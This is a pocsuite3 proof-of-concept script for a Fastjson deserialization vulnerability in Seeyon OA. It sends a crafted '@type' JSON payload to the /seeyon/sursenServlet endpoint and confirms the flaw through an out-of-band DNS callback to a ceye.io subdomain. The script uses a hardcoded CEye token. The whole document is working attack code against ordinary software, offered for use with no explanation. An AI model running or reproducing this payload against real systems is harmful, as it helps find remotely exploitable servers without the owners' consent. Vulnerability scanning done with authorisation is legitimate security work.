致远OA JSON反序列化漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from urllib.parse import urljoin from pocsuite3.api import Output, POCBase, register_poc, logger, requests from pocsuite3.lib.utils import random_str from pocsuite3.modules.ceye import CEye class DemoPOC(POCBase): vulID = '99116' # ssvid version = '3.0' author = [''] vulDate = '2021-1-27' createDate = '2021-1-27' updateDate = '2021-1-27' references = [''] name = 'Seeyon OA Fastjson Deserialize' appPowerLink = '' appName = 'Seeyon OA' appVersion = '' vulType = 'RCE' desc = ''' 致远OA Fastjson反序列化 ''' samples = [] install_requires = [''] def check(self): headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip, deflate' } dns_key = random_str(6) dnslog_url = "{}.j3170ioc.ceye.io".format(dns_key) vul_url = urljoin(self.url, '/seeyon/sursenServlet') data = 'sursenData={"rand2":{"@type":"java.net.Inet4Address","val":"%s"}}' % dnslog_url logger.info("ceye check key: {} for {}".format(dns_key, self.url)) requests.post(vul_url, data=data, headers=headers) ce = CEye(token='5df9bef9ed0d27df6f8csc1452b99b5b2p') if ce.verify_request(dns_key, type='dns'): return True return False def _verify(self): result = {} try: if self.check(): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url except Exception as e: logger.error(str(e)) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(DemoPOC)